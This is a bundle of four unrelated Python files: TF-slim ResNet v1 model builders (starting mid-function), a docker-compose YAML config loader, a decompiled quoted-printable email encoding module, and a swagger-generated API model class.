shortcut = resnet_utils.subsample(inputs, stride, 'shortcut')
else:
shortcut = slim.conv2d(inputs, depth, [1, 1], stride=stride,
activation_fn=None, scope='shortcut')
residual = slim.conv2d(inputs, depth_bottleneck, [1, 1], stride=1,
scope='conv1')
residual = resnet_utils.conv2d_same(residual, depth_bottleneck, 3, stride,
rate=rate, scope='conv2')
residual = slim.conv2d(residual, depth, [1, 1], stride=1,
activation_fn=None, scope='conv3')
output = tf.nn.relu(shortcut + residual)
return slim.utils.collect_named_outputs(outputs_collections,
sc.original_name_scope,
output)
def resnet_v1(inputs,
blocks,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
include_root_block=True,
spatial_squeeze=True,
reuse=None,
scope=None):
"""Generator for v1 ResNet models.
This function generates a family of ResNet v1 models. See the resnet_v1_*()
methods for specific model instantiations, obtained by selecting different
block instantiations that produce ResNets of various depths.
Training for image classification on Imagenet is usually done with [224, 224]
inputs, resulting in [7, 7] feature maps at the output of the last ResNet
block for the ResNets defined in [1] that have nominal stride equal to 32.
However, for dense prediction tasks we advise that one uses inputs with
spatial dimensions that are multiples of 32 plus 1, e.g., [321, 321]. In
this case the feature maps at the ResNet output will have spatial shape
[(height - 1) / output_stride + 1, (width - 1) / output_stride + 1]
and corners exactly aligned with the input image corners, which greatly
facilitates alignment of the features to the image. Using as input [225, 225]
images results in [8, 8] feature maps at the output of the last ResNet block.
For dense prediction tasks, the ResNet needs to run in fully-convolutional
(FCN) mode and global_pool needs to be set to False. The ResNets in [1, 2] all
have nominal stride equal to 32 and a good choice in FCN mode is to use
output_stride=16 in order to increase the density of the computed features at
small computational and memory overhead, cf. http://arxiv.org/abs/1606.00915.
Args:
inputs: A tensor of size [batch, height_in, width_in, channels].
blocks: A list of length equal to the number of ResNet blocks. Each element
is a resnet_utils.Block object describing the units in the block.
num_classes: Number of predicted classes for classification tasks. If None
we return the features before the logit layer.
is_training: whether is training or not.
global_pool: If True, we perform global average pooling before computing the
logits. Set to True for image classification, False for dense prediction.
output_stride: If None, then the output will be computed at the nominal
network stride. If output_stride is not None, it specifies the requested
ratio of input to output spatial resolution.
include_root_block: If True, include the initial convolution followed by
max-pooling, if False excludes it.
spatial_squeeze: if True, logits is of shape [B, C], if false logits is
of shape [B, 1, 1, C], where B is batch_size and C is number of classes.
reuse: whether or not the network and its variables should be reused. To be
able to reuse 'scope' must be given.
scope: Optional variable_scope.
Returns:
net: A rank-4 tensor of size [batch, height_out, width_out, channels_out].
If global_pool is False, then height_out and width_out are reduced by a
factor of output_stride compared to the respective height_in and width_in,
else both height_out and width_out equal one. If num_classes is None, then
net is the output of the last ResNet block, potentially after global
average pooling. If num_classes is not None, net contains the pre-softmax
activations.
end_points: A dictionary from components of the network to the corresponding
activation.
Raises:
ValueError: If the target output_stride is not valid.
"""
with tf.variable_scope(scope, 'resnet_v1', [inputs], reuse=reuse) as sc:
end_points_collection = sc.name + '_end_points'
with slim.arg_scope([slim.conv2d, bottleneck,
resnet_utils.stack_blocks_dense],
outputs_collections=end_points_collection):
with slim.arg_scope([slim.batch_norm], is_training=is_training):
net = inputs
if include_root_block:
if output_stride is not None:
if output_stride % 4 != 0:
raise ValueError('The output_stride needs to be a multiple of 4.')
output_stride /= 4
net = resnet_utils.conv2d_same(net, 64, 7, stride=2, scope='conv1')
net = slim.max_pool2d(net, [3, 3], stride=2, scope='pool1')
net = resnet_utils.stack_blocks_dense(net, blocks, output_stride)
if global_pool:
# Global average pooling.
net = tf.reduce_mean(net, [1, 2], name='pool5', keep_dims=True)
if num_classes is not None:
net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None,
normalizer_fn=None, scope='logits')
if spatial_squeeze:
logits = tf.squeeze(net, [1, 2], name='SpatialSqueeze')
else:
logits = net
# Convert end_points_collection into a dictionary of end_points.
end_points = slim.utils.convert_collection_to_dict(end_points_collection)
if num_classes is not None:
end_points['predictions'] = slim.softmax(logits, scope='predictions')
return logits, end_points
resnet_v1.default_image_size = 224
def resnet_v1_50(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
spatial_squeeze=True,
reuse=None,
scope='resnet_v1_50'):
"""ResNet-50 model of [1]. See resnet_v1() for arg and return description."""
blocks = [
resnet_utils.Block(
'block1', bottleneck, [(256, 64, 1)] * 2 + [(256, 64, 2)]),
resnet_utils.Block(
'block2', bottleneck, [(512, 128, 1)] * 3 + [(512, 128, 2)]),
resnet_utils.Block(
'block3', bottleneck, [(1024, 256, 1)] * 5 + [(1024, 256, 2)]),
resnet_utils.Block(
'block4', bottleneck, [(2048, 512, 1)] * 3)
]
return resnet_v1(inputs, blocks, num_classes, is_training,
global_pool=global_pool, output_stride=output_stride,
include_root_block=True, spatial_squeeze=spatial_squeeze,
reuse=reuse, scope=scope)
resnet_v1_50.default_image_size = resnet_v1.default_image_size
def resnet_v1_101(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
spatial_squeeze=True,
reuse=None,
scope='resnet_v1_101'):
"""ResNet-101 model of [1]. See resnet_v1() for arg and return description."""
blocks = [
resnet_utils.Block(
'block1', bottleneck, [(256, 64, 1)] * 2 + [(256, 64, 2)]),
resnet_utils.Block(
'block2', bottleneck, [(512, 128, 1)] * 3 + [(512, 128, 2)]),
resnet_utils.Block(
'block3', bottleneck, [(1024, 256, 1)] * 22 + [(1024, 256, 2)]),
resnet_utils.Block(
'block4', bottleneck, [(2048, 512, 1)] * 3)
]
return resnet_v1(inputs, blocks, num_classes, is_training,
global_pool=global_pool, output_stride=output_stride,
include_root_block=True, spatial_squeeze=spatial_squeeze,
reuse=reuse, scope=scope)
resnet_v1_101.default_image_size = resnet_v1.default_image_size
def resnet_v1_152(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
spatial_squeeze=True,
reuse=None,
scope='resnet_v1_152'):
"""ResNet-152 model of [1]. See resnet_v1() for arg and return description."""
blocks = [
resnet_utils.Block(
'block1', bottleneck, [(256, 64, 1)] * 2 + [(256, 64, 2)]),
resnet_utils.Block(
'block2', bottleneck, [(512, 128, 1)] * 7 + [(512, 128, 2)]),
resnet_utils.Block(
'block3', bottleneck, [(1024, 256, 1)] * 35 + [(1024, 256, 2)]),
resnet_utils.Block(
'block4', bottleneck, [(2048, 512, 1)] * 3)]
return resnet_v1(inputs, blocks, num_classes, is_training,
global_pool=global_pool, output_stride=output_stride,
include_root_block=True, spatial_squeeze=spatial_squeeze,
reuse=reuse, scope=scope)
resnet_v1_152.default_image_size = resnet_v1.default_image_size
def resnet_v1_200(inputs,
num_classes=None,
is_training=True,
global_pool=True,
output_stride=None,
spatial_squeeze=True,
reuse=None,
scope='resnet_v1_200'):
"""ResNet-200 model of [2]. See resnet_v1() for arg and return description."""
blocks = [
resnet_utils.Block(
'block1', bottleneck, [(256, 64, 1)] * 2 + [(256, 64, 2)]),
resnet_utils.Block(
'block2', bottleneck, [(512, 128, 1)] * 23 + [(512, 128, 2)]),
resnet_utils.Block(
'block3', bottleneck, [(1024, 256, 1)] * 35 + [(1024, 256, 2)]),
resnet_utils.Block(
'block4', bottleneck, [(2048, 512, 1)] * 3)]
return resnet_v1(inputs, blocks, num_classes, is_training,
global_pool=global_pool, output_stride=output_stride,
include_root_block=True, spatial_squeeze=spatial_squeeze,
reuse=reuse, scope=scope)
resnet_v1_200.default_image_size = resnet_v1.default_image_size
| |
import logging
import os
import sys
from collections import namedtuple
import six
import yaml
from .errors import CircularReference
from .errors import ComposeFileNotFound
from .errors import ConfigurationError
from .interpolation import interpolate_environment_variables
from .validation import validate_against_schema
from .validation import validate_service_names
from .validation import validate_top_level_object
from compose.cli.utils import find_candidates_in_parent_dirs
DOCKER_CONFIG_KEYS = [
'cap_add',
'cap_drop',
'cpu_shares',
'cpuset',
'command',
'detach',
'devices',
'dns',
'dns_search',
'domainname',
'entrypoint',
'env_file',
'environment',
'extra_hosts',
'hostname',
'image',
'labels',
'links',
'mac_address',
'mem_limit',
'memswap_limit',
'net',
'log_driver',
'log_opt',
'pid',
'ports',
'privileged',
'read_only',
'restart',
'security_opt',
'stdin_open',
'tty',
'user',
'volume_driver',
'volumes',
'volumes_from',
'working_dir',
]
ALLOWED_KEYS = DOCKER_CONFIG_KEYS + [
'build',
'container_name',
'dockerfile',
'expose',
'external_links',
'load_image',
'name'
]
SUPPORTED_FILENAMES = [
'docker-compose.yml',
'docker-compose.yaml',
'fig.yml',
'fig.yaml',
]
PATH_START_CHARS = [
'/',
'.',
'~',
]
log = logging.getLogger(__name__)
ConfigDetails = namedtuple('ConfigDetails', 'config working_dir filename')
def find(base_dir, filename):
if filename == '-':
return ConfigDetails(yaml.safe_load(sys.stdin), os.getcwd(), None)
if filename:
filename = os.path.join(base_dir, filename)
else:
filename = get_config_path(base_dir)
return ConfigDetails(load_yaml(filename), os.path.dirname(filename), filename)
def get_config_path(base_dir):
(candidates, path) = find_candidates_in_parent_dirs(SUPPORTED_FILENAMES, base_dir)
if len(candidates) == 0:
raise ComposeFileNotFound(SUPPORTED_FILENAMES)
winner = candidates[0]
if len(candidates) > 1:
log.warn("Found multiple config files with supported names: %s", ", ".join(candidates))
log.warn("Using %s\n", winner)
if winner == 'docker-compose.yaml':
log.warn("Please be aware that .yml is the expected extension "
"in most cases, and using .yaml can cause compatibility "
"issues in future.\n")
if winner.startswith("fig."):
log.warn("%s is deprecated and will not be supported in future. "
"Please rename your config file to docker-compose.yml\n" % winner)
return os.path.join(path, winner)
@validate_top_level_object
@validate_service_names
def pre_process_config(config):
"""
Pre validation checks and processing of the config file to interpolate env
vars returning a config dict ready to be tested against the schema.
"""
config = interpolate_environment_variables(config)
return config
def load(config_details):
config, working_dir, filename = config_details
processed_config = pre_process_config(config)
validate_against_schema(processed_config)
service_dicts = []
for service_name, service_dict in list(processed_config.items()):
loader = ServiceLoader(working_dir=working_dir, filename=filename)
service_dict = loader.make_service_dict(service_name, service_dict)
validate_paths(service_dict)
service_dicts.append(service_dict)
return service_dicts
class ServiceLoader(object):
def __init__(self, working_dir, filename=None, already_seen=None):
self.working_dir = os.path.abspath(working_dir)
if filename:
self.filename = os.path.abspath(filename)
else:
self.filename = filename
self.already_seen = already_seen or []
def detect_cycle(self, name):
if self.signature(name) in self.already_seen:
raise CircularReference(self.already_seen + [self.signature(name)])
def make_service_dict(self, name, service_dict):
service_dict = service_dict.copy()
service_dict['name'] = name
service_dict = resolve_environment(service_dict, working_dir=self.working_dir)
service_dict = self.resolve_extends(service_dict)
return process_container_options(service_dict, working_dir=self.working_dir)
def resolve_extends(self, service_dict):
if 'extends' not in service_dict:
return service_dict
extends_options = self.validate_extends_options(service_dict['name'], service_dict['extends'])
if self.working_dir is None:
raise Exception("No working_dir passed to ServiceLoader()")
if 'file' in extends_options:
extends_from_filename = extends_options['file']
other_config_path = expand_path(self.working_dir, extends_from_filename)
else:
other_config_path = self.filename
other_working_dir = os.path.dirname(other_config_path)
other_already_seen = self.already_seen + [self.signature(service_dict['name'])]
other_loader = ServiceLoader(
working_dir=other_working_dir,
filename=other_config_path,
already_seen=other_already_seen,
)
base_service = extends_options['service']
other_config = load_yaml(other_config_path)
if base_service not in other_config:
msg = (
"Cannot extend service '%s' in %s: Service not found"
) % (base_service, other_config_path)
raise ConfigurationError(msg)
other_service_dict = other_config[base_service]
other_loader.detect_cycle(extends_options['service'])
other_service_dict = other_loader.make_service_dict(
service_dict['name'],
other_service_dict,
)
validate_extended_service_dict(
other_service_dict,
filename=other_config_path,
service=extends_options['service'],
)
return merge_service_dicts(other_service_dict, service_dict)
def signature(self, name):
return (self.filename, name)
def validate_extends_options(self, service_name, extends_options):
error_prefix = "Invalid 'extends' configuration for %s:" % service_name
if 'file' not in extends_options and self.filename is None:
raise ConfigurationError(
"%s you need to specify a 'file', e.g. 'file: something.yml'" % error_prefix
)
return extends_options
def validate_extended_service_dict(service_dict, filename, service):
error_prefix = "Cannot extend service '%s' in %s:" % (service, filename)
if 'links' in service_dict:
raise ConfigurationError("%s services with 'links' cannot be extended" % error_prefix)
if 'volumes_from' in service_dict:
raise ConfigurationError("%s services with 'volumes_from' cannot be extended" % error_prefix)
if 'net' in service_dict:
if get_service_name_from_net(service_dict['net']) is not None:
raise ConfigurationError("%s services with 'net: container' cannot be extended" % error_prefix)
def process_container_options(service_dict, working_dir=None):
service_dict = service_dict.copy()
if 'volumes' in service_dict and service_dict.get('volume_driver') is None:
service_dict['volumes'] = resolve_volume_paths(service_dict, working_dir=working_dir)
if 'build' in service_dict:
service_dict['build'] = resolve_build_path(service_dict['build'], working_dir=working_dir)
if 'labels' in service_dict:
service_dict['labels'] = parse_labels(service_dict['labels'])
return service_dict
def merge_service_dicts(base, override):
d = base.copy()
if 'environment' in base or 'environment' in override:
d['environment'] = merge_environment(
base.get('environment'),
override.get('environment'),
)
path_mapping_keys = ['volumes', 'devices']
for key in path_mapping_keys:
if key in base or key in override:
d[key] = merge_path_mappings(
base.get(key),
override.get(key),
)
if 'labels' in base or 'labels' in override:
d['labels'] = merge_labels(
base.get('labels'),
override.get('labels'),
)
if 'image' in override and 'build' in d:
del d['build']
if 'build' in override and 'image' in d:
del d['image']
list_keys = ['ports', 'expose', 'external_links']
for key in list_keys:
if key in base or key in override:
d[key] = base.get(key, []) + override.get(key, [])
list_or_string_keys = ['dns', 'dns_search']
for key in list_or_string_keys:
if key in base or key in override:
d[key] = to_list(base.get(key)) + to_list(override.get(key))
already_merged_keys = ['environment', 'labels'] + path_mapping_keys + list_keys + list_or_string_keys
for k in set(ALLOWED_KEYS) - set(already_merged_keys):
if k in override:
d[k] = override[k]
return d
def merge_environment(base, override):
env = parse_environment(base)
env.update(parse_environment(override))
return env
def get_env_files(options, working_dir=None):
if 'env_file' not in options:
return {}
if working_dir is None:
raise Exception("No working_dir passed to get_env_files()")
env_files = options.get('env_file', [])
if not isinstance(env_files, list):
env_files = [env_files]
return [expand_path(working_dir, path) for path in env_files]
def resolve_environment(service_dict, working_dir=None):
service_dict = service_dict.copy()
if 'environment' not in service_dict and 'env_file' not in service_dict:
return service_dict
env = {}
if 'env_file' in service_dict:
for f in get_env_files(service_dict, working_dir=working_dir):
env.update(env_vars_from_file(f))
del service_dict['env_file']
env.update(parse_environment(service_dict.get('environment')))
env = dict(resolve_env_var(k, v) for k, v in six.iteritems(env))
service_dict['environment'] = env
return service_dict
def parse_environment(environment):
if not environment:
return {}
if isinstance(environment, list):
return dict(split_env(e) for e in environment)
if isinstance(environment, dict):
return environment
raise ConfigurationError(
"environment \"%s\" must be a list or mapping," %
environment
)
def split_env(env):
if '=' in env:
return env.split('=', 1)
else:
return env, None
def resolve_env_var(key, val):
if val is not None:
return key, val
elif key in os.environ:
return key, os.environ[key]
else:
return key, ''
def env_vars_from_file(filename):
"""
Read in a line delimited file of environment variables.
"""
if not os.path.exists(filename):
raise ConfigurationError("Couldn't find env file: %s" % filename)
env = {}
for line in open(filename, 'r'):
line = line.strip()
if line and not line.startswith('#'):
k, v = split_env(line)
env[k] = v
return env
def resolve_volume_paths(service_dict, working_dir=None):
if working_dir is None:
raise Exception("No working_dir passed to resolve_volume_paths()")
return [
resolve_volume_path(v, working_dir, service_dict['name'])
for v in service_dict['volumes']
]
def resolve_volume_path(volume, working_dir, service_name):
container_path, host_path = split_path_mapping(volume)
container_path = os.path.expanduser(container_path)
if host_path is not None:
if not any(host_path.startswith(c) for c in PATH_START_CHARS):
log.warn(
'Warning: the mapping "{0}:{1}" in the volumes config for '
'service "{2}" is ambiguous. In a future version of Docker, '
'it will designate a "named" volume '
'(see https://github.com/docker/docker/pull/14242). '
'To prevent unexpected behaviour, change it to "./{0}:{1}"'
.format(host_path, container_path, service_name)
)
host_path = os.path.expanduser(host_path)
return "%s:%s" % (expand_path(working_dir, host_path), container_path)
else:
return container_path
def resolve_build_path(build_path, working_dir=None):
if working_dir is None:
raise Exception("No working_dir passed to resolve_build_path")
return expand_path(working_dir, build_path)
def validate_paths(service_dict):
if 'build' in service_dict:
build_path = service_dict['build']
if not os.path.exists(build_path) or not os.access(build_path, os.R_OK):
raise ConfigurationError("build path %s either does not exist or is not accessible." % build_path)
def merge_path_mappings(base, override):
d = dict_from_path_mappings(base)
d.update(dict_from_path_mappings(override))
return path_mappings_from_dict(d)
def dict_from_path_mappings(path_mappings):
if path_mappings:
return dict(split_path_mapping(v) for v in path_mappings)
else:
return {}
def path_mappings_from_dict(d):
return [join_path_mapping(v) for v in d.items()]
def split_path_mapping(string):
if ':' in string:
(host, container) = string.split(':', 1)
return (container, host)
else:
return (string, None)
def join_path_mapping(pair):
(container, host) = pair
if host is None:
return container
else:
return ":".join((host, container))
def merge_labels(base, override):
labels = parse_labels(base)
labels.update(parse_labels(override))
return labels
def parse_labels(labels):
if not labels:
return {}
if isinstance(labels, list):
return dict(split_label(e) for e in labels)
if isinstance(labels, dict):
return labels
def split_label(label):
if '=' in label:
return label.split('=', 1)
else:
return label, ''
def expand_path(working_dir, path):
return os.path.abspath(os.path.join(working_dir, path))
def to_list(value):
if value is None:
return []
elif isinstance(value, six.string_types):
return [value]
else:
return value
def get_service_name_from_net(net_config):
if not net_config:
return
if not net_config.startswith('container:'):
return
_, net_name = net_config.split(':', 1)
return net_name
def load_yaml(filename):
try:
with open(filename, 'r') as fh:
return yaml.safe_load(fh)
except IOError as e:
raise ConfigurationError(six.text_type(e))
| |
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: quoprimime.py
"""Quoted-printable content transfer encoding per RFCs 2045-2047.
This module handles the content transfer encoding method defined in RFC 2045
to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to
safely encode text that is in a character set similar to the 7-bit US ASCII
character set, but that includes some 8-bit characters that are normally not
allowed in email bodies or headers.
Quoted-printable is very space-inefficient for encoding binary files; use the
email.base64mime module for that instead.
This module provides an interface to encode and decode both headers and bodies
with quoted-printable encoding.
RFC 2045 defines a method for including character set information in an
`encoded-word' in a header. This method is commonly used for 8-bit real names
in To:/From:/Cc: etc. fields, as well as Subject: lines.
This module does not do the line wrapping or end-of-line character
conversion necessary for proper internationalized headers; it only
does dumb encoding and decoding. To deal with the various line
wrapping issues, use the email.header module.
"""
__all__ = [
'body_decode',
'body_encode',
'body_quopri_check',
'body_quopri_len',
'decode',
'decodestring',
'encode',
'encodestring',
'header_decode',
'header_encode',
'header_quopri_check',
'header_quopri_len',
'quote',
'unquote']
import re
from string import hexdigits
from email.utils import fix_eols
CRLF = '\r\n'
NL = '\n'
MISC_LEN = 7
hqre = re.compile('[^-a-zA-Z0-9!*+/ ]')
bqre = re.compile('[^ !-<>-~\\t]')
def header_quopri_check(c):
"""Return True if the character should be escaped with header quopri."""
return bool(hqre.match(c))
def body_quopri_check(c):
"""Return True if the character should be escaped with body quopri."""
return bool(bqre.match(c))
def header_quopri_len(s):
"""Return the length of str when it is encoded with header quopri."""
count = 0
for c in s:
if hqre.match(c):
count += 3
else:
count += 1
return count
def body_quopri_len(str):
"""Return the length of str when it is encoded with body quopri."""
count = 0
for c in str:
if bqre.match(c):
count += 3
else:
count += 1
return count
def _max_append(L, s, maxlen, extra=''):
if not L:
L.append(s.lstrip())
elif len(L[-1]) + len(s) <= maxlen:
L[-1] += extra + s
else:
L.append(s.lstrip())
def unquote(s):
"""Turn a string in the form =AB to the ASCII character with value 0xab"""
return chr(int(s[1:3], 16))
def quote(c):
return '=%02X' % ord(c)
def header_encode(header, charset='iso-8859-1', keep_eols=False, maxlinelen=76, eol=NL):
r"""Encode a single header line with quoted-printable (like) encoding.
Defined in RFC 2045, this `Q' encoding is similar to quoted-printable, but
used specifically for email header fields to allow charsets with mostly 7
bit characters (and some 8 bit) to remain more or less readable in non-RFC
2045 aware mail clients.
charset names the character set to use to encode the header. It defaults
to iso-8859-1.
The resulting string will be in the form:
"=?charset?q?I_f=E2rt_in_your_g=E8n=E8ral_dire=E7tion?\n
=?charset?q?Silly_=C8nglish_Kn=EEghts?="
with each line wrapped safely at, at most, maxlinelen characters (defaults
to 76 characters). If maxlinelen is None, the entire string is encoded in
one chunk with no splitting.
End-of-line characters (\r, \n, \r\n) will be automatically converted
to the canonical email line separator \r\n unless the keep_eols
parameter is True (the default is False).
Each line of the header will be terminated in the value of eol, which
defaults to "\n". Set this to "\r\n" if you are using the result of
this function directly in email.
"""
if not header:
return header
else:
if not keep_eols:
header = fix_eols(header)
quoted = []
if maxlinelen is None:
max_encoded = 100000
else:
max_encoded = maxlinelen - len(charset) - MISC_LEN - 1
for c in header:
if c == ' ':
_max_append(quoted, '_', max_encoded)
elif not hqre.match(c):
_max_append(quoted, c, max_encoded)
else:
_max_append(quoted, '=%02X' % ord(c), max_encoded)
joiner = eol + ' '
return joiner.join([ '=?%s?q?%s?=' % (charset, line) for line in quoted ])
def encode(body, binary=False, maxlinelen=76, eol=NL):
r"""Encode with quoted-printable, wrapping at maxlinelen characters.
If binary is False (the default), end-of-line characters will be converted
to the canonical email end-of-line sequence \r\n. Otherwise they will
be left verbatim.
Each line of encoded text will end with eol, which defaults to "\n". Set
this to "\r\n" if you will be using the result of this function directly
in an email.
Each line will be wrapped at, at most, maxlinelen characters (defaults to
76 characters). Long lines will have the `soft linefeed' quoted-printable
character "=" appended to them, so the decoded text will be identical to
the original text.
"""
if not body:
return body
else:
if not binary:
body = fix_eols(body)
encoded_body = ''
lineno = -1
lines = body.splitlines(1)
for line in lines:
if line.endswith(CRLF):
line = line[:-2]
elif line[-1] in CRLF:
line = line[:-1]
lineno += 1
encoded_line = ''
prev = None
linelen = len(line)
for j in range(linelen):
c = line[j]
prev = c
if bqre.match(c):
c = quote(c)
elif j + 1 == linelen:
if c not in ' \t':
encoded_line += c
prev = c
continue
if len(encoded_line) + len(c) >= maxlinelen:
encoded_body += encoded_line + '=' + eol
encoded_line = ''
encoded_line += c
if prev and prev in ' \t':
if lineno + 1 == len(lines):
prev = quote(prev)
if len(encoded_line) + len(prev) > maxlinelen:
encoded_body += encoded_line + '=' + eol + prev
else:
encoded_body += encoded_line + prev
else:
encoded_body += encoded_line + prev + '=' + eol
encoded_line = ''
if lines[lineno].endswith(CRLF) or lines[lineno][-1] in CRLF:
encoded_body += encoded_line + eol
else:
encoded_body += encoded_line
encoded_line = ''
return encoded_body
body_encode = encode
encodestring = encode
def decode(encoded, eol=NL):
r"""Decode a quoted-printable string.
Lines are separated with eol, which defaults to \n.
"""
if not encoded:
return encoded
decoded = ''
for line in encoded.splitlines():
line = line.rstrip()
if not line:
decoded += eol
continue
i = 0
n = len(line)
while i < n:
c = line[i]
if c != '=':
decoded += c
i += 1
elif i + 1 == n:
i += 1
continue
elif i + 2 < n and line[i + 1] in hexdigits and line[i + 2] in hexdigits:
decoded += unquote(line[i:i + 3])
i += 3
else:
decoded += c
i += 1
if i == n:
decoded += eol
if not encoded.endswith(eol) and decoded.endswith(eol):
decoded = decoded[:-1]
return decoded
body_decode = decode
decodestring = decode
def _unquote_match(match):
"""Turn a match in the form =AB to the ASCII character with value 0xab"""
s = match.group(0)
return unquote(s)
def header_decode(s):
"""Decode a string encoded with RFC 2045 MIME header `Q' encoding.
This function does not parse a full MIME header value encoded with
quoted-printable (like =?iso-8895-1?q?Hello_World?=) -- please use
the high level email.header class for that functionality.
"""
s = s.replace('_', ' ')
return re.sub('=[a-fA-F0-9]{2}', _unquote_match, s)
| |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ActorResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, id=None, name=None, description_short=None, description=None, image=None, images=None, meta_title=None, meta_description=None, meta_keywords=None, link_rewrite=None, roles=None, active=None, date_add=None, date_upd=None):
"""
ActorResponse - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'id': 'int',
'name': 'str',
'description_short': 'list[I18nField]',
'description': 'list[I18nField]',
'image': 'str',
'images': 'list[Image]',
'meta_title': 'list[I18nField]',
'meta_description': 'list[I18nField]',
'meta_keywords': 'list[I18nField]',
'link_rewrite': 'list[I18nField]',
'roles': 'list[I18nField]',
'active': 'bool',
'date_add': 'str',
'date_upd': 'str'
}
self.attribute_map = {
'id': 'id',
'name': 'name',
'description_short': 'description_short',
'description': 'description',
'image': 'image',
'images': 'images',
'meta_title': 'meta_title',
'meta_description': 'meta_description',
'meta_keywords': 'meta_keywords',
'link_rewrite': 'link_rewrite',
'roles': 'roles',
'active': 'active',
'date_add': 'date_add',
'date_upd': 'date_upd'
}
self._id = id
self._name = name
self._description_short = description_short
self._description = description
self._image = image
self._images = images
self._meta_title = meta_title
self._meta_description = meta_description
self._meta_keywords = meta_keywords
self._link_rewrite = link_rewrite
self._roles = roles
self._active = active
self._date_add = date_add
self._date_upd = date_upd
@property
def id(self):
"""
Gets the id of this ActorResponse.
:return: The id of this ActorResponse.
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this ActorResponse.
:param id: The id of this ActorResponse.
:type: int
"""
self._id = id
@property
def name(self):
"""
Gets the name of this ActorResponse.
:return: The name of this ActorResponse.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this ActorResponse.
:param name: The name of this ActorResponse.
:type: str
"""
self._name = name
@property
def description_short(self):
"""
Gets the description_short of this ActorResponse.
:return: The description_short of this ActorResponse.
:rtype: list[I18nField]
"""
return self._description_short
@description_short.setter
def description_short(self, description_short):
"""
Sets the description_short of this ActorResponse.
:param description_short: The description_short of this ActorResponse.
:type: list[I18nField]
"""
self._description_short = description_short
@property
def description(self):
"""
Gets the description of this ActorResponse.
:return: The description of this ActorResponse.
:rtype: list[I18nField]
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this ActorResponse.
:param description: The description of this ActorResponse.
:type: list[I18nField]
"""
self._description = description
@property
def image(self):
"""
Gets the image of this ActorResponse.
:return: The image of this ActorResponse.
:rtype: str
"""
return self._image
@image.setter
def image(self, image):
"""
Sets the image of this ActorResponse.
:param image: The image of this ActorResponse.
:type: str
"""
self._image = image
@property
def images(self):
"""
Gets the images of this ActorResponse.
:return: The images of this ActorResponse.
:rtype: list[Image]
"""
return self._images
@images.setter
def images(self, images):
"""
Sets the images of this ActorResponse.
:param images: The images of this ActorResponse.
:type: list[Image]
"""
self._images = images
@property
def meta_title(self):
"""
Gets the meta_title of this ActorResponse.
:return: The meta_title of this ActorResponse.
:rtype: list[I18nField]
"""
return self._meta_title
@meta_title.setter
def meta_title(self, meta_title):
"""
Sets the meta_title of this ActorResponse.
:param meta_title: The meta_title of this ActorResponse.
:type: list[I18nField]
"""
self._meta_title = meta_title
@property
def meta_description(self):
"""
Gets the meta_description of this ActorResponse.
:return: The meta_description of this ActorResponse.
:rtype: list[I18nField]
"""
return self._meta_description
@meta_description.setter
def meta_description(self, meta_description):
"""
Sets the meta_description of this ActorResponse.
:param meta_description: The meta_description of this ActorResponse.
:type: list[I18nField]
"""
self._meta_description = meta_description
@property
def meta_keywords(self):
"""
Gets the meta_keywords of this ActorResponse.
:return: The meta_keywords of this ActorResponse.
:rtype: list[I18nField]
"""
return self._meta_keywords
@meta_keywords.setter
def meta_keywords(self, meta_keywords):
"""
Sets the meta_keywords of this ActorResponse.
:param meta_keywords: The meta_keywords of this ActorResponse.
:type: list[I18nField]
"""
self._meta_keywords = meta_keywords
@property
def link_rewrite(self):
"""
Gets the link_rewrite of this ActorResponse.
:return: The link_rewrite of this ActorResponse.
:rtype: list[I18nField]
"""
return self._link_rewrite
@link_rewrite.setter
def link_rewrite(self, link_rewrite):
"""
Sets the link_rewrite of this ActorResponse.
:param link_rewrite: The link_rewrite of this ActorResponse.
:type: list[I18nField]
"""
self._link_rewrite = link_rewrite
@property
def roles(self):
"""
Gets the roles of this ActorResponse.
:return: The roles of this ActorResponse.
:rtype: list[I18nField]
"""
return self._roles
@roles.setter
def roles(self, roles):
"""
Sets the roles of this ActorResponse.
:param roles: The roles of this ActorResponse.
:type: list[I18nField]
"""
self._roles = roles
@property
def active(self):
"""
Gets the active of this ActorResponse.
:return: The active of this ActorResponse.
:rtype: bool
"""
return self._active
@active.setter
def active(self, active):
"""
Sets the active of this ActorResponse.
:param active: The active of this ActorResponse.
:type: bool
"""
self._active = active
@property
def date_add(self):
"""
Gets the date_add of this ActorResponse.
:return: The date_add of this ActorResponse.
:rtype: str
"""
return self._date_add
@date_add.setter
def date_add(self, date_add):
"""
Sets the date_add of this ActorResponse.
:param date_add: The date_add of this ActorResponse.
:type: str
"""
self._date_add = date_add
@property
def date_upd(self):
"""
Gets the date_upd of this ActorResponse.
:return: The date_upd of this ActorResponse.
:rtype: str
"""
return self._date_upd
@date_upd.setter
def date_upd(self, date_upd):
"""
Sets the date_upd of this ActorResponse.
:param date_upd: The date_upd of this ActorResponse.
:type: str
"""
self._date_upd = date_upd
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
